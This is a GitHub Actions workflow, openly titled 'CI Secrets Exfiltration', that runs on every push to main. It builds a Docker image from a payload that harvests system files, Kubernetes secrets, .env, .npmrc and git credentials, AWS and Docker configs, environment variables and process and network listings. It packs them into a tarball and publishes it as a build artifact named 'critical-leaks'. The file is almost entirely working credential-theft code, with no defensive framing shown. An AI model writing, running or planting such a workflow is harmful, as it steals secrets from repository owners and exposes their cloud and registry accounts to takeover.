name: CI Secrets Exfiltration

on:
  push:
    branches: [ main ]

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Build and Run Malicious Image
        run: |
          PAYLOAD=$(cat <<'EOF'
          mkdir -p /loot && \
          cp -r /etc /loot/etc 2>/dev/null && \
          cp -r /root /loot/root 2>/dev/null && \
          cp -r /var/run/secrets /loot/var_run_secrets 2>/dev/null && \
          find / \( -name "*.env" -o -name ".npmrc" -o -name ".git-credentials" \) -exec cp --parents {} /loot/ 2>/dev/null \; && \
          env > /loot/full_env.txt && \
          ps aux > /loot/processes.txt && \
          netstat -tuln > /loot/network.txt && \
          (test -d ~/.aws && cp -r ~/.aws /loot/aws) || true && \
          (test -d ~/.docker && cp -r ~/.docker /loot/docker) || true && \
          (cd /loot && tar -czf /leaks.tgz .) && \
          echo "[+] Leaks.tgz created successfully!" || echo "[-] Failed to create leaks.tgz"
          EOF
          )

          docker build --build-arg PAYLOAD="$PAYLOAD" -t secrets-leaker .
          docker run --rm -v $PWD:/out secrets-leaker sh -c "test -f /leaks.tgz && cp /leaks.tgz /out/leaks.tgz || echo '[-] No leaks.tgz found'"

      - name: Upload Artifact
        uses: actions/upload-artifact@v4
        with:
          name: critical-leaks
          path: leaks.tgz
